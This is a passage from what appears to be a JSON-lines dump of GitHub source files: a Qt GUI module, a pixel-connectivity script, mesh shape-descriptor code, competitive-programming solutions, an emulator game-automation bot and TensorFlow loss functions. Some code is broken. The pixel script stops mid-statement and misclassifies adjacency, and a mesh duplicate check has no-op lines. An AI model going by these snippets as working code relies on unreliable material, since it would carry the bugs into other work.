front.print('name_tbl_changed()')\n row, col = (item.row(), item.column())\n sel_nx = front.get_nametbl_nx(row) # The changed row's name index\n new_val = csv_sanatize(item.text()) # sanatize val for csv\n header_lbl = front.get_nametbl_header(col) # Get changed column\n front.aliasNameSignal.emit(sel_nx, header_lbl, new_val)\n\n #=======================\n # Table Clicked Functions\n #=======================\n @slot_(QTableWidgetItem)\n @clicked\n def img_tbl_clicked(front, item):\n row = item.row()\n front.print('img_tbl_clicked(%r)' % (row))\n sel_gx = front.get_imgtbl_gx(row)\n front.selectGxSignal.emit(sel_gx)\n\n @slot_(QTableWidgetItem)\n @clicked\n def chip_tbl_clicked(front, item):\n row, col = (item.row(), item.column())\n front.print('chip_tbl_clicked(%r, %r)' % (row, col))\n sel_cid = front.get_chiptbl_cid(row)\n front.selectCidSignal.emit(sel_cid)\n\n @slot_(QTableWidgetItem)\n @clicked\n def res_tbl_clicked(front, item):\n row, col = (item.row(), item.column())\n front.print('res_tbl_clicked(%r, %r)' % (row, col))\n sel_cid = front.get_restbl_cid(row)\n front.selectResSignal.emit(sel_cid)\n\n @slot_(QTableWidgetItem)\n @clicked\n def name_tbl_clicked(front, item):\n row, col = (item.row(), item.column())\n front.print('name_tbl_clicked(%r, %r)' % (row, col))\n sel_name = front.get_nametbl_name(row)\n front.selectNameSignal.emit(sel_name)\n\n #=======================\n # Other\n #=======================\n\n @slot_(int)\n def change_view(front, new_state):\n tab_name = str(front.ui.tablesTabWidget.tabText(new_state))\n front.print('change_view(%r)' % new_state)\n prevBlock = front.ui.tablesTabWidget.blockSignals(True)\n front.ui.tablesTabWidget.blockSignals(prevBlock)\n if tab_name.startswith('Query Results Table'):\n print(front.back.hs.get_cache_uid())\n\n @slot_(str, str, list)\n def modal_useroption(front, msg, title, options):\n pass\n\n @slot_(str)\n def gui_write(front, msg_):\n app = front.back.app\n outputEdit = front.ui.outputEdit\n # Write msg to text area\n outputEdit.moveCursor(QtGui.QTextCursor.End)\n # TODO: Find out how to do backspaces in textEdit\n msg = str(msg_)\n if msg.find('\\b') != -1:\n msg = msg.replace('\\b', '') + '\\n'\n outputEdit.insertPlainText(msg)\n if app is not None:\n app.processEvents()\n\n @slot_()\n def gui_flush(front):\n app = front.back.app\n if app is not None:\n app.processEvents()\n #front.ui.outputEdit.moveCursor(QtGui.QTextCursor.End)\n #front.ui.outputEdit.insertPlainText(msg)\n","repo_name":"Erotemic/hotspotter","sub_path":"hsgui/guifront.py","file_name":"guifront.py","file_ext":"py","file_size_in_byte":27368,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"77"} +{"seq_id":"35504819700","text":"import sys\nimport math\n\n# Parse command-line arguments\nif len(sys.argv) != 3:\n print(\"Usage: python adjacency_connectivity.py \")\n sys.exit()\n\ninput_file = sys.argv[1]\noutput_file = sys.argv[2]\n\n# Read the input image file line by line\nwith open(input_file, 'r') as f:\n lines = f.readlines()\n\n# Extract the image dimensions and pixel values\nassert lines[0].startswith('P2')\nwidth, height = map(int, lines[2].split())\nmax_value = int(lines[3])\npixels = [[int(int(val) >= 128) for val in line.split()] for line in lines[4:]]\n\n# Define the coordinates of two pixels to compare\nx1, y1 = 10, 10\nx2, y2 = 20, 20\n\n# Check adjacency between the two pixels\ndx, dy = abs(x1 - x2), abs(y1 - y2)\ndist = math.sqrt(dx**2 + dy**2)\nif dist == 1:\n print(\"The two pixels are 4-adjacent.\")\nelif dist == math.sqrt(2):\n print(\"The two pixels are 8-adjacent.\")\nelse:\n print(\"The two pixels are m-adjacent.\")\n\n# Check connectivity between the two pixels\nvisited = [[False]*width for _ in range(height)]\nstack = [(x1, y1)]\nvisited[y1][x1] = True\nconnected = False\nwhile stack:\n x, y = stack.pop()\n if x == x2 and y == y2:\n connected = True\n break\n for dx, dy in [(-1, 0), (1, 0), (0, -1), (0, 1)]:\n new_x, new_y = x + dx, y + dy\n if 0 <= new_x < width and 0 <= new_y < height and not visited[new_y][new_x] and pixels[new_y][new_x]:\n visited[new_y][new_x] = True\n stack.append((new_x, new_y))\n\nif connected:\n print(\"The two pixels are connected.\")\nelse:\n print(\"The two pixels are not connected.\")\n\n# Compute the digital path between the two pixels\nif connected:\n path = []\n x, y = x1, y1\n dx, dy = x2 - x1, y2 - y1\n sx, sy = 1 if dx > 0 else -1, 1 if dy > 0 else -1\n dx, dy = abs(dx), abs\n\n","repo_name":"ImDarkShadow/UnivSemThree","sub_path":"Pixel Connectivity.py","file_name":"Pixel Connectivity.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16890278056","text":"import logging\nimport math\nimport os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport trimesh\nfrom matplotlib.ticker import PercentFormatter\nfrom scipy.spatial.distance import cdist\nfrom trimesh import convex\n\nimport utils\n\ntrimesh.util.attach_to_log()\nlogging.getLogger('matplotlib.font_manager').disabled = True\n\n\ndef volume(mesh):\n v1s = mesh.vertices[mesh.faces][::, 0] - mesh.centroid\n v2s = mesh.vertices[mesh.faces][::, 1] - mesh.centroid\n v3s = mesh.vertices[mesh.faces][::, 2] - mesh.centroid\n v = 1 / 6 * np.abs(np.sum(np.cross(v1s, v2s) * v3s))\n return v\n\n\ndef compactness(mesh):\n if mesh.area > 0:\n c = np.divide(np.power(mesh.area, 3), (36 * np.pi * np.power(volume(mesh), 2)))\n else:\n c = 0\n return c if not np.isnan(c) else 0\n\n\ndef diameter(mesh):\n try:\n conv_hull_points = trimesh.convex.hull_points(mesh)\n d = np.max(cdist(conv_hull_points, conv_hull_points, metric='euclidean'))\n except:\n print(\"error calculating hull, reverting to brute force diameter calculation\")\n d = np.max(cdist(mesh.vertices, mesh.vertices, metric='euclidean'))\n\n return d\n\n\ndef eccentricity(mesh):\n values, _ = utils.eigen_values_vectors(mesh)\n ecc = values[np.argmin(values)] / values[np.argmax(values)]\n return ecc\n\n\ndef barycentre_distance(mesh):\n return np.sqrt(np.sum(mesh.centroid * mesh.centroid))\n\n\ndef bounding_box_volume(mesh):\n x = mesh.bounds\n volume = (x[1][0] - x[0][0]) * (x[1][1] - x[0][1]) * (x[1][2] - x[0][2])\n return volume\n\n\ndef merge_bins():\n df = utils.read_excel(original=False)\n for column in df[utils.hist_features]:\n values = np.asarray(df[column])\n newvalues = list(map(lambda x: x[np.arange(0, 20, step=2)] + x[np.arange(1, 21, step=2)], values))\n df[column] = newvalues\n utils.save_excel(df, original=False)\n\n\ndef filter_database(dbPath, excelPath, picklePath, features=True):\n db = dbPath\n df = pd.DataFrame()\n utils.ensure_dir(excelPath)\n utils.ensure_dir(picklePath)\n index_to_class, class_sizes = utils.class_dictionaries()\n # iterate over all models:\n for classFolder in os.listdir(db):\n for modelFolder in os.listdir(db + '/' + classFolder):\n for filename in os.listdir(db + '/' + classFolder + '/' + modelFolder):\n if filename.endswith('.off'):\n # Find the relevant info for the mesh:\n file_number = int(filename[1:-4])\n shape_class = index_to_class[file_number]\n if shape_class in class_sizes:\n path = db + '/' + classFolder + '/' + modelFolder + '/' + filename\n mesh = trimesh.load(path, force='mesh')\n mesh_info = fill_mesh_info(mesh, shape_class, path, features)\n df = df.append(mesh_info, ignore_index=True)\n\n df.to_excel(excelPath)\n df.to_pickle(picklePath)\n\n\ndef make_bins(list, lowerbound, upperbound, nrbins, plot):\n if plot:\n return list, {\"blocksize\": (upperbound / nrbins), \"xlim\": lowerbound, \"ylabel\": \"Percentage\"}\n bins = np.histogram(list, bins=nrbins, range=(lowerbound, upperbound), density=True)\n\n return bins[0]\n\n\ndef select_random_number_expection(exclude, selected_vertices):\n if len(exclude) == 1:\n new_list = [el for el in selected_vertices if not np.array_equal(el, exclude[0])]\n return new_list[np.random.randint(0, high=len(new_list))]\n\n\ndef check_duplicates(mesh, selected_vertices, number_vertices):\n for idx, vertice in enumerate(selected_vertices):\n if number_vertices < 2:\n if np.array_equal(vertice[0], vertice[1]):\n selected_vertices[idx, 0] = select_random_number_expection(vertice[0], mesh.vertices)\n if number_vertices < 3:\n continue\n\n if np.array_equal(vertice[0], vertice[2]):\n selected_vertices[idx, 0] = select_random_number_expection(vertice[0], mesh.vertices)\n if np.array_equal(vertice[1], vertice[2]):\n selected_vertices[idx, 1] = select_random_number_expection(vertice[1], mesh.vertices)\n\n if number_vertices < 4:\n continue\n\n if np.array_equal(vertice[0], vertice[3]):\n selected_vertices[idx, 0], select_random_number_expection(vertice[0], mesh.vertices)\n if np.array_equal(vertice[2], vertice[3]):\n selected_vertices[idx, 2], select_random_number_expection(vertice[2], mesh.vertices)\n if np.array_equal(vertice[1], vertice[3]):\n selected_vertices[idx, 1], select_random_number_expection(vertice[1], mesh.vertices)\n\n return selected_vertices\n\n\ndef A3(mesh, amount=utils.hist_amount, plot=False):\n random_vertices = mesh.vertices[np.random.randint(0, high=len(mesh.vertices), size=(amount, 3))]\n random_vertices = check_duplicates(mesh, random_vertices, 3)\n angles = np.arccos(\n np.clip(np.sum(utils.unit_vector(np.subtract(random_vertices[::, 0], random_vertices[::, 1]), transpose=True) *\n utils.unit_vector(np.subtract(random_vertices[::, 0], random_vertices[::, 2]), transpose=True),\n axis=1), -1.0, 1.0))\n return make_bins(angles, 0, math.pi, utils.nr_bins_hist, plot)\n\n\ndef D1(mesh, amount=utils.target_vertices, plot=False):\n # Distance barycentre to random vertice\n random_vertices = mesh.vertices[np.random.randint(0, high=len(mesh.vertices), size=(amount))]\n distance_barycentre = np.sqrt(np.sum(np.power(random_vertices, 2), axis=1))\n return make_bins(distance_barycentre, 0, 0.75, utils.nr_bins_hist, plot)\n\n\ndef D2(mesh, amount=utils.hist_amount, plot=False):\n # Distance between two random vertices\n random_vertices = mesh.vertices[np.random.randint(0, high=len(mesh.vertices), size=(amount, 2))]\n random_vertices = check_duplicates(mesh, random_vertices, 2)\n distance_vertices = np.sqrt(np.sum(np.power(random_vertices[::, 0] - random_vertices[::, 1], 2), axis=1))\n return make_bins(distance_vertices, 0, 1, utils.nr_bins_hist, plot)\n\n\ndef D3(mesh, amount=utils.hist_amount, plot=False):\n # Root of area of triangle given by three random vertices\n random_vertices = mesh.vertices[np.random.randint(0, high=len(mesh.vertices), size=(amount, 3))]\n random_vertices = check_duplicates(mesh, random_vertices, 3)\n area_vertices = np.sqrt(np.sqrt(np.sum(\n np.power(np.cross(random_vertices[::, 0] - random_vertices[::, 2], random_vertices[::, 1] - random_vertices[::, 2]),\n 2), axis=1)) / 2)\n return make_bins(area_vertices, 0, 2 / 3, utils.nr_bins_hist, plot)\n\n\ndef D4(mesh, amount=utils.hist_amount, plot=False):\n # Cubic root of volume of tetahedron given by four random vertices\n random_vertices = mesh.vertices[np.random.randint(0, high=len(mesh.vertices), size=(amount, 4))]\n random_vertices = check_duplicates(mesh, random_vertices, 4)\n vectors1 = random_vertices[::, 0] - random_vertices[::, 3]\n vectors2 = random_vertices[::, 1] - random_vertices[::, 3]\n vectors3 = random_vertices[::, 2] - random_vertices[::, 3]\n volumes = np.power(np.divide(np.absolute(np.sum(vectors1 * (np.cross(vectors2, vectors3)), axis=1)), 6), (1.0 / 3))\n return make_bins(volumes, 0, 0.6 * 0.55, utils.nr_bins_hist, plot)\n\n\ndef tetrahedon_volume(vertices):\n vector1 = vertices[0] - vertices[3]\n vector2 = vertices[1] - vertices[3]\n vector3 = vertices[2] - vertices[3]\n volume = abs(np.dot(vector1, (np.cross(vector2, vector3)))) / 6\n return volume\n\n\ndef AABB_volume(mesh):\n x = abs(mesh.bounds[0][0] - mesh.bounds[1][0])\n y = abs(mesh.bounds[0][1] - mesh.bounds[1][1])\n z = abs(mesh.bounds[0][2] - mesh.bounds[1][2])\n return x * y * z\n\n\ndef fill_mesh_info(mesh, shape_class, path, features=True):\n face_sizes = list(map(lambda x: len(x), mesh.faces))\n print(f\"analyzing model {path}\")\n if features:\n mesh_info = {\"class\": shape_class, \"nrfaces\": len(mesh.faces), \"nrvertices\": len(mesh.vertices),\n \"containsTriangles\": 3 in face_sizes, \"containsQuads\": 4 in face_sizes,\n \"bounding_box_corners\": mesh.bounds, \"path\": f'{path}',\n \"axis-aligned_bounding_box_volume\": AABB_volume(mesh),\n \"barycentre_distance\": barycentre_distance(mesh),\n \"volume\": volume(mesh),\n \"area\": mesh.area,\n \"eccentricity\": eccentricity(mesh),\n \"eigen_x_angle\": utils.eigen_angle(mesh),\n \"diameter\": diameter(mesh),\n \"compactness\": compactness(mesh),\n \"A3\": A3(mesh),\n \"D1\": D1(mesh),\n \"D2\": D2(mesh),\n \"D3\": D3(mesh),\n \"D4\": D4(mesh),\n \"area_faces\": mesh.area_faces}\n\n else:\n mesh_info = {\"class\": shape_class, \"nrfaces\": len(mesh.faces), \"nrvertices\": len(mesh.vertices),\n \"containsTriangles\": 3 in face_sizes, \"containsQuads\": 4 in face_sizes,\n \"bounding_box_corners\": mesh.bounds, \"path\": f'{path}',\n \"axis-aligned_bounding_box_volume\": np.linalg.norm(mesh.bounds[0] - mesh.bounds[1]),\n \"barycentre_distance\": barycentre_distance(mesh),\n \"volume\": volume(mesh),\n \"area\": mesh.area,\n \"eigen_x_angle\": utils.eigen_angle(mesh),\n \"area_faces\": mesh.area_faces\n }\n mesh_info = detect_outliers(mesh, mesh_info)\n return mesh_info\n\n\ndef detect_outliers(mesh, mesh_info):\n if len(mesh.vertices) < utils.target_vertices * 0.9:\n mesh_info[\"subsampled_outlier\"] = True\n mesh_info[\"supersampled_outlier\"] = False\n elif len(mesh.vertices) > utils.target_vertices * 1.1:\n mesh_info[\"supersampled_outlier\"] = True\n mesh_info[\"subsampled_outlier\"] = False\n else:\n mesh_info[\"subsampled_outlier\"] = False\n mesh_info[\"supersampled_outlier\"] = False\n return mesh_info\n\n\ndef meta_data(dataframe):\n # Calculate metadata on the datafram\n metadata = {}\n metadata[\"avgfaces\"] = np.mean(dataframe.loc[:, \"nrfaces\"].values)\n metadata[\"minfaces\"] = np.min(dataframe.loc[:, \"nrfaces\"].values)\n metadata[\"maxfaces\"] = np.max(dataframe.loc[:, \"nrfaces\"].values)\n\n metadata[\"avgvertices\"] = np.mean(dataframe.loc[:, \"nrvertices\"].values)\n metadata[\"minvertices\"] = np.min(dataframe.loc[:, \"nrvertices\"].values)\n metadata[\"maxvertices\"] = np.max(dataframe.loc[:, \"nrvertices\"].values)\n\n metadata[\"avgbarycentre_distance\"] = np.mean(dataframe.loc[:, \"barycentre_distance\"].values)\n metadata[\"volume\"] = np.mean(dataframe.loc[:, \"volume\"].values)\n return metadata\n\n\ndef histograms_all_classes(data, column):\n fig, axs = plt.subplots(5, 3, figsize=(20, 15))\n index_to_class, class_sizes = utils.class_dictionaries()\n for index, c in enumerate(class_sizes.keys()):\n for i in data.loc[data[\"class\"] == c, column]:\n axs[index % 5, int(index / 5)].plot(i)\n # axs[c % 6, int(c / 6)].xaxis.set_major_formatter(mtick.PercentFormatter(10))\n # axs[c % 6, int(c / 6)].yaxis.set_major_formatter(mtick.PercentFormatter(20000))\n axs[index % 5, int(index / 5)].set_title(c)\n\n fig.tight_layout()\n fig.savefig(utils.refinedImagePath + \"all_classes\" + column + '.png')\n\n\ndef save_histogram(data, info, path):\n # the histogram of the data\n\n # reset params\n plt.rcParams.update(plt.rcParamsDefault)\n plt.figure()\n # drop NA values if they exist\n if info['skip_outliers']:\n # Remove all data below the 5th percentile and 95th percentile\n p5 = np.percentile(data, 5)\n p95 = np.percentile(data, 95)\n data = data[data >= p5]\n data = data[data <= p95]\n if info[\"xlim\"] > 0:\n bins = np.arange(0, info[\"xlim\"], info[\"xlim\"] / info[\"blocksize\"])\n else:\n bins = info[\"blocksize\"]\n if 'column' in info and info['column'] == 'class':\n bins = np.concatenate([bins, [15.0]]) - 0.5\n plt.xlim(-0.5, info[\"xlim\"] - 0.5)\n plt.xticks(rotation=90)\n plt.subplots_adjust(bottom=0.34)\n plt.hist(data, bins=bins, facecolor='g', alpha=0.75)\n if info[\"ylim\"] > 0:\n plt.ylim(0, info[\"ylim\"])\n plt.xlabel(info[\"xlabel\"])\n plt.ylabel(info[\"ylabel\"])\n plt.title(info[\"title\"])\n if info[\"xlim\"] != 0 and not ('column' in info and info['column'] == 'class'):\n plt.xlim(0, info[\"xlim\"])\n # plt.grid(True)\n plt.gcf().subplots_adjust(left=0.15)\n utils.ensure_dir(path)\n plt.savefig(path + info[\"title\"] + '.png')\n plt.clf()\n plt.cla()\n\n\ndef save_all_histograms(df, path, features=False):\n plotInfos = [\n {\"column\": \"class\", \"title\": \"Class distribution\", \"blocksize\": 15, \"xlim\": 15, \"ylim\": 0, \"ylabel\": \"#Meshes\",\n \"xlabel\": \"Class name\", \"skip_outliers\": False},\n {\"column\": \"nrfaces\", \"title\": \"Face distribution\", \"blocksize\": 25, \"xlim\": 0, \"ylim\": 750, \"ylabel\": \"#Meshes\",\n \"xlabel\": \"Number of faces\", \"skip_outliers\": True},\n {\"column\": \"nrvertices\", \"title\": \"Vertice distribution\", \"blocksize\": 25, \"xlim\": 0, \"ylim\": 800,\n \"ylabel\": \"#Meshes\",\n \"xlabel\": \"Number of vertices\", \"skip_outliers\": True},\n {\"column\": \"volume\", \"title\": \"Mesh volume\", \"blocksize\": 15, \"xlim\": 0, \"ylim\": 1400, \"ylabel\": \"#Meshes\",\n \"xlabel\": \"Mesh volume\", \"skip_outliers\": True},\n {\"column\": \"barycentre_distance\", \"title\": \"Barycentre origin distance\", \"blocksize\": 20, \"xlim\": 1, \"ylim\": 1400,\n \"ylabel\": \"#Meshes\", \"xlabel\": \"Distance barycentre to origin\", \"skip_outliers\": False},\n {\"column\": \"axis-aligned_bounding_box_volume\", \"title\": \"Axis-aligned bounding box volume\", \"blocksize\": 15,\n \"xlim\": 0, \"ylim\": 1400, \"ylabel\": \"#Meshes\", \"xlabel\": \"Volume of axis aligned bounding box\",\n \"skip_outliers\": False},\n {\"column\": \"eigen_x_angle\", \"ylim\": 1400, \"title\": \"Angle largest eigenvector - x-axis\", \"blocksize\": 15,\n \"xlim\": 3.2, \"ylabel\": \"#Meshes\", \"xlabel\": \"Radian angle between largest eigenvector and x-axis\",\n \"skip_outliers\": False},\n {\"column\": \"area\", \"title\": \"Mesh surface area\", \"blocksize\": 15,\n \"xlim\": 0, \"ylim\": 1400, \"ylabel\": \"#Meshes\", \"xlabel\": \"Total surface area of the mesh\", \"skip_outliers\": True}\n ]\n if features:\n plotInfos += [\n {\"column\": \"compactness\", \"title\": \"Compactness\", \"blocksize\": 15, \"xlim\": 0, \"ylim\": 0, \"ylabel\": \"#Meshes\",\n \"xlabel\": \"Compactness\", \"skip_outliers\": True},\n {\"column\": \"eccentricity\", \"title\": \"Eccentricity\", \"blocksize\": 15, \"xlim\": 0, \"ylim\": 0, \"ylabel\": \"#Meshes\",\n \"xlabel\": \"Eccentricity\", \"skip_outliers\": True},\n {\"column\": \"diameter\", \"title\": \"Diameter\", \"blocksize\": 15, \"xlim\": 0, \"ylim\": 0, \"ylabel\": \"#Meshes\",\n \"xlabel\": \"Diameter\", \"skip_outliers\": False}\n ]\n\n # Area_faces plot:\n all_areas = [values for values in df.loc[:, \"area_faces\"].values]\n all_areas = np.array([value for sublist in all_areas for value in sublist])\n plotinfo = {\"title\": \"Face area distribution over all meshes\", \"blocksize\": 25, \"xlim\": 0.0006, \"ylim\": 0,\n \"ylabel\": \"#faces\",\n \"xlabel\": \"face area\", \"skip_outliers\": True}\n save_histogram(all_areas, plotinfo, path)\n for info in plotInfos:\n save_histogram(df.loc[:, info['column']].values, info, path)\n\n\ndef plot_shape_properties(feature, shape, classes=1):\n path = utils.refinedImagePath\n mesh = trimesh.load(shape)\n # render([mesh])\n if feature == \"A3\":\n bins, info = A3(mesh, plot=True)\n title = \"Angle between three random points\"\n if feature == \"D1\":\n bins, info = D1(mesh, plot=True)\n title = \" Distance between the barycenter and a random point\"\n if feature == \"D2\":\n bins, info = D2(mesh, plot=True)\n title = \" Distance between two random point\"\n if feature == \"D3\":\n bins, info = D3(mesh, plot=True)\n title = \"Square root of the area of triangle made by three random point\"\n if feature == \"D4\":\n bins, info = D4(mesh, plot=True)\n title = \"Cube root of the volume of tetrahedron made by three random points\"\n plt.hist(bins, facecolor='g', alpha=0.75, weights=np.ones(len(bins)) / len(bins))\n plt.gca().yaxis.set_major_formatter(PercentFormatter(1))\n plt.xlabel(feature)\n plt.ylabel(info[\"ylabel\"])\n # plt.title(title + \" of class\" + classes[classes])\n plt.savefig(path + feature + shape[-8:-4] + '.png')\n # plt.show()\n\n\ndef visualize_difference_features():\n plot_shape_properties(feature=\"A3\", shape='testModels/refined_db/1/m102/m102.off', classes=1)\n plot_shape_properties(feature=\"A3\", shape='testModels/refined_db/1/m105/m105.off', classes=1)\n plot_shape_properties(feature=\"A3\", shape='testModels/refined_db/17/m1703/m1703.off', classes=17)\n\n plot_shape_properties(feature=\"D1\", shape='testModels/refined_db/18/m1812/m1812.off')\n plot_shape_properties(feature=\"D1\", shape='testModels/refined_db/18/m1814/m1814.off')\n plot_shape_properties(feature=\"D1\", shape='testModels/refined_db/9/m909/m909.off')\n\n plot_shape_properties(feature=\"D2\", shape='testModels/refined_db/16/m1601/m1601.off')\n plot_shape_properties(feature=\"D2\", shape='testModels/refined_db/16/m1600/m1600.off')\n plot_shape_properties(feature=\"D2\", shape='testModels/refined_db/17/m1712/m1712.off')\n\n plot_shape_properties(feature=\"D3\", shape='testModels/refined_db/14/m1402/m1402.off')\n plot_shape_properties(feature=\"D3\", shape='testModels/refined_db/14/m1403/m1403.off')\n plot_shape_properties(feature=\"D3\", shape='testModels/refined_db/13/m1306/m1306.off')\n\n plot_shape_properties(feature=\"D4\", shape='testModels/refined_db/5/m500/m500.off')\n plot_shape_properties(feature=\"D4\", shape='testModels/refined_db/5/m507/m507.off')\n plot_shape_properties(feature=\"D4\", shape='testModels/refined_db/7/m704/m704.off')\n\n# mesh = trimesh.load('testModels/refined_db/1/m104/m104.off', force='mesh')\n# diameter(mesh)\n","repo_name":"myrthemh/MultimediaRetrieval","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":17351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11842762008","text":"#!/usr/bin/env python3\n\n#import\nimport math\n#import numpy as np\n#= int(input())\n#= input()\nS, P = map(int, input().split())\n\ndef is_ok(N):\n M = S - N\n return N * M <= P\n\ndef meguru_bisect(ok, ng):\n while abs(ok - ng) > 1:\n mid = (ok + ng) // 2\n if is_ok(mid):\n ok = mid\n else:\n ng = mid\n return ok\n\nans = meguru_bisect(1, S // 2 + 1)\n\nif ans * (S - ans) == P:\n print(\"Yes\")\nelse:\n print(\"No\")\n","repo_name":"Yukikazari/kyoupuro","sub_path":".提出一覧/AtCoder/arc108/a/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7134933758","text":"\nclass Solution:\n def removeElement(self, nums, val: int) -> int:\n i, j = 0, len(nums)-1\n\n while i self.threshold:\n return status\n return \"UnKnown\"\n\n def end_game(self):\n try:\n sys.exit(0)\n except Exception as e:\n print('运行结束')\n\n def my_sleep(self,sec):\n time_limits = sec\n start_times = time.time()\n while (time.time() - start_times) < time_limits:\n self.quit_game()\n return\n\n def quit_game(self):\n time_passed = (time.time() - self.start_time) / 60\n if (not self.quit) & (time_passed < int(self.time_limit)) & (self.count < int(self.count_limit)):\n return\n self.status_message = \"运行结束\"\n print(\"运行结束\")\n self.end_game()\n\n def start_game(self):\n self.win = win32gui.FindWindow(None, self.win_name)\n print(self.win_name)\n self.quit = False\n self.start_time = time.time()\n self.count = 0\n while (1):\n time_passed = (time.time() - self.start_time) / 60\n print(\"已运行 \", \"%.2f\" % time_passed, \" / \", self.time_limit, \"分钟 \", \"战斗:\", self.count, \" / \",\n self.count_limit, \" 次\")\n self.time_message = \"已运行 \"+ \"%.2f\" % time_passed+\" / \"+ str(self.time_limit)+ \"分钟 \\n\"+ \"战斗:\"+ str(self.count)+ \" / \"+ str(self.count_limit)+ \" 次\"\n\n self.quit_game()\n status = self.get_status()\n if status == \"UnKnown\":\n self.my_sleep(1)\n self.status_message = \"未知界面,识别失败\"\n print(\"未知界面,识别失败\")\n continue\n\n if status == \"start_small\":\n self.mouse_click(self.find_position(self.start_small,False,False))\n self.status_message = \"开始战斗\"\n print(\"开始战斗\")\n self.my_sleep(1)\n continue\n if status == \"recharge\":\n if (self.if_recharge[0]) & (self.if_recharge[1]>0):\n self.mouse_click(self.find_position(self.recharge, False,False))\n self.status_message =\"体力不足,恢复体力\"\n print(\"体力不足,恢复体力\")\n self.my_sleep(1)\n self.if_recharge[1]-=1\n print(\"剩余恢复次数: \",self.if_recharge[1])\n continue\n print(\"体力耗尽,终止程序\")\n break\n if status == \"level_up\":\n self.mouse_click(self.find_position(self.level_up, False,False))\n print(\"升级啦\")\n self.status_message = \"升级啦\"\n self.my_sleep(1)\n continue\n\n if status == \"start_big\":\n self.mouse_click(self.find_position(self.start_big, False,False))\n print(\"编队完成,开始战斗\")\n self.status_message = \"编队完成,开始战斗\"\n self.my_sleep(1)\n continue\n\n if status == \"battle_normal\":\n print(\"战斗中\")\n self.status_message = \"战斗中\"\n self.my_sleep(20)\n continue\n\n if status == \"battle_failed\":\n print(\"战斗失败\")\n self.status_message = \"战斗失败\"\n self.my_sleep(2)\n if if_battle_fail_continue:\n self.mouse_click(self.find_position(self.battle_failed, False,False))\n print(\"继续战斗\")\n self.status_message = \"继续战斗\"\n continue\n self.status_message = \"退出程序\"\n print(\"退出程序\")\n break\n\n if status == \"end\":\n self.mouse_click(self.find_position(self.end, False,False))\n self.count += 1\n self.status_message = \"战斗完成\"\n print(\"战斗完成\")\n self.my_sleep(2)\n continue\n\n# if __name__ == \"__main__\":\n# win = manager(\"明日方舟 - MuMu模拟器\")\n#\n# self.my_sleep(1)\n# # print(get_win_size(ratio,win))\n# # get_screen_shoot(ratio,win).show()\n# # win32gui.SetWindowPos(win, win32con.HWND_TOPMOST, 0,0,int(1600/ratio),int(988/ratio), win32con.SWP_SHOWWINDOW)\n# # win32api.MessageBox(0, \"请勿改变窗口大小,窗口将会锁定在最顶层\", \"提醒\",win32con.MB_ICONWARNING)\n# win.start_game()\n\n\n\n\n\n\n","repo_name":"YulongWang2020/arknights_helper","sub_path":"manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":9914,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"42715345983","text":"class Solution:\n def simplifyPath(self, path: str) -> str:\n files = path.split('/')\n stack = []\n for file in files:\n if file == '' or file == '.':\n continue\n if file == '..':\n if len(stack)>0:\n stack.pop()\n else:\n stack.append(file)\n return '/'+'/'.join(stack)","repo_name":"OmarAbdulwahab/My-LeetCode-Solved-Problems","sub_path":"0071-simplify-path/0071-simplify-path.py","file_name":"0071-simplify-path.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"17551907765","text":"import tensorflow as tf\nfrom db_config import cfg\n\n\ndef dice_coefficient_loss(y_true_cls, y_pred_cls,\n training_mask):\n '''\n dice loss\n :param y_true_cls:\n :param y_pred_cls:\n :param training_mask:\n :return:\n '''\n eps = 1e-6\n intersection = tf.reduce_sum(y_true_cls * y_pred_cls * training_mask)\n union = tf.reduce_sum(y_true_cls * training_mask) + tf.reduce_sum(y_pred_cls * training_mask) + eps\n loss = 1. - (2 * intersection / union)\n return loss\n\n\ndef balance_cross_entropy_loss(gt, pred, mask,\n negative_ratio=3.0, eps=1e-6):\n positive = gt * mask\n negative = (1 - gt) * mask\n positive_count = tf.reduce_sum(positive)\n negative_count = tf.minimum(tf.reduce_sum(negative), positive_count * negative_ratio)\n negative_count = tf.cast(negative_count, tf.int32)\n gt = tf.reshape(gt, [-1, 1])\n pred = tf.reshape(pred, [-1, 1])\n cross_entropy = tf.nn.sigmoid_cross_entropy_with_logits(labels=gt, logits=pred)\n positive_loss = cross_entropy * positive\n negative_loss = cross_entropy * negative\n negative_loss, _ = tf.nn.top_k(tf.reshape(negative_loss, [-1]), negative_count)\n\n negative_count = tf.cast(negative_count, tf.float32)\n balance_loss = (tf.reduce_sum(positive_loss) + tf.reduce_sum(negative_loss)) / (positive_count + negative_count + eps)\n\n return balance_loss\n\ndef softmax_cross_entropy_loss(y_true_cls, y_pred_cls, training_mask):\n '''\n softmax_cross_entropy(SCE) loss\n :param y_true_cls:[bs,w,h,N]\n :param y_pred_cls:[bs,w,h,N]\n :param training_mask:\n :return:\n '''\n re_mask = 1 - training_mask\n zero_mask = tf.zeros(tf.shape(re_mask))\n add_mask = tf.concat((re_mask, zero_mask, zero_mask), axis=3)\n\n y_true_cls = y_true_cls * training_mask + add_mask\n y_pred_cls = y_pred_cls * training_mask + add_mask\n\n y_true_cls = tf.reshape(y_true_cls, [-1, tf.shape(y_true_cls)[-1]])\n y_pred_cls = tf.reshape(y_pred_cls, [-1, tf.shape(y_true_cls)[-1]])\n\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=y_true_cls, logits=y_pred_cls)\n cls_loss = tf.reduce_mean(cross_entropy)\n\n return cls_loss\n\ndef l1_loss(pred, gt, mask):\n\n loss = tf.reduce_mean(tf.abs(pred - gt) * mask) + 1e-6\n\n return loss\n\n\ndef smooth_l1_loss(pred, gt, mask, sigma=1.0):\n '''\n\n :param pred:\n :param gt: shape is same as pred\n :param sigma:\n :return:\n '''\n sigma2 = sigma**2\n\n diff = pred * mask - 